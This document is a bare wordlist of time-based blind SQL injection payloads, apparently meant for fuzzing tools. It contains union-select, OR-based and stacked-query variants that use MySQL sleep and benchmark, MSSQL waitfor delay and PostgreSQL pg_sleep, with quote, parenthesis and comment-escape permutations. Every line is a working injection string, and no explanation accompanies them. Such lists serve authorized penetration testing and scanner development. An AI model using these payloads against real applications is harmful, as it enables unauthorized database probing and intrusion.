' union select sleep(3)#
" union select sleep(3)#
') union select sleep(3)#
") union select sleep(3)#
')) union select sleep(3)#
")) union select sleep(3)#
' union select waitfor delay '0:0:03';--
" union select waitfor delay '0:0:03';--
') union select waitfor delay '0:0:03';--
") union select waitfor delay '0:0:03';--
')) union select waitfor delay '0:0:03';--
")) union select waitfor delay '0:0:03';--
' union select from pg_sleep(3)--
" union select from pg_sleep(3)--
') union select from pg_sleep(3)--
") union select from pg_sleep(3)--
')) union select from pg_sleep(3)--
")) union select from pg_sleep(3)--
' union select null sleep(3)#
" union select null sleep(3)#
') union select null sleep(3)#
") union select null sleep(3)#
')) union select null sleep(3)#
")) union select null sleep(3)#
' union select null waitfor delay '0:0:03';--
" union select null waitfor delay '0:0:03';--
') union select null waitfor delay '0:0:03';--
") union select null waitfor delay '0:0:03';--
')) union select null waitfor delay '0:0:03';--
")) union select null waitfor delay '0:0:03';--
' union select null from pg_sleep(3)--
" union select null from pg_sleep(3)--
') union select null from pg_sleep(3)--
") union select null from pg_sleep(3)--
')) union select null from pg_sleep(3)--
")) union select null from pg_sleep(3)--
' union select null,null sleep(3)#
" union select null,null sleep(3)#
') union select null,null sleep(3)#
") union select null,null sleep(3)#
')) union select null,null sleep(3)#
")) union select null,null sleep(3)#
' union select null,null waitfor delay '0:0:03';--
" union select null,null waitfor delay '0:0:03';--
') union select null,null waitfor delay '0:0:03';--
") union select null,null waitfor delay '0:0:03';--
')) union select null,null waitfor delay '0:0:03';--
")) union select null,null waitfor delay '0:0:03';--
' union select null,null from pg_sleep(3)--
" union select null,null from pg_sleep(3)--
') union select null,null from pg_sleep(3)--
") union select null,null from pg_sleep(3)--
')) union select null,null from pg_sleep(3)--
")) union select null,null from pg_sleep(3)--
sleep(3)#
1 or sleep(3)#
" or sleep(3)#
' or sleep(3)#
" or sleep(3)="
' or sleep(3)='
1) or sleep(3)#
") or sleep(3)="
') or sleep(3)='
1)) or sleep(3)#
")) or sleep(3)="
')) or sleep(3)='
'waitfor delay '0:0:03';--
;waitfor delay '0:0:3'--
);waitfor delay '0:0:3'--
';waitfor delay '0:0:3'--
";waitfor delay '0:0:3'--
');waitfor delay '0:0:3'--
");waitfor delay '0:0:3'--
));waitfor delay '0:0:3'--
'));waitfor delay '0:0:3'--
"));waitfor delay '0:0:3'--
benchmark(10000000,MD5(1))#
1 or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
' or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(3)--
1 or pg_sleep(3)--
" or pg_sleep(3)--
' or pg_sleep(3)--
1) or pg_sleep(3)--
") or pg_sleep(3)--
') or pg_sleep(3)--
1)) or pg_sleep(3)--
")) or pg_sleep(3)--
')) or pg_sleep(3)--
AND (SELECT * FROM (SELECT(SLEEP(3)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(3)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(3)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(3)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(3)))nQIP)#
SLEEP(3)#
SLEEP(3)--
SLEEP(3)="
SLEEP(3)='
or SLEEP(3)
or SLEEP(3)#
or SLEEP(3)--
or SLEEP(3)="
or SLEEP(3)='
waitfor delay '00:00:03'
waitfor delay '00:00:03'--
waitfor delay '00:00:03'#
benchmark(30000000,MD5(1))
benchmark(30000000,MD5(1))--
benchmark(30000000,MD5(1))#
or benchmark(30000000,MD5(1))
or benchmark(30000000,MD5(1))--
or benchmark(30000000,MD5(1))#
pg_SLEEP(3)
pg_SLEEP(3)--
pg_SLEEP(3)#
or pg_SLEEP(3)
or pg_SLEEP(3)--
or pg_SLEEP(3)#
AnD SLEEP(3)
AnD SLEEP(3)--
AnD SLEEP(3)#
&&SLEEP(3)
&&SLEEP(3)--
&&SLEEP(3)#
' AnD SLEEP(3) ANd '1
'&&SLEEP(3)&&'1
ORDER BY SLEEP(3)
ORDER BY SLEEP(3)--
ORDER BY SLEEP(3)#
(SELECT * FROM (SELECT(SLEEP(3)))ecMj)
(SELECT * FROM (SELECT(SLEEP(3)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(3)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(3) + '
SLEEP(3)/*' or SLEEP(3) or '" or SLEEP(3) or "*/
*/ sleep(3)
*/ sleep(3)#
*/ sleep(3)--
*/ sleep(3)="
*/ sleep(3)='
*/ waitfor delay '0:0:03';--
*/ pg_SLEEP(3)
*/ pg_SLEEP(3)--
*/ pg_SLEEP(3)#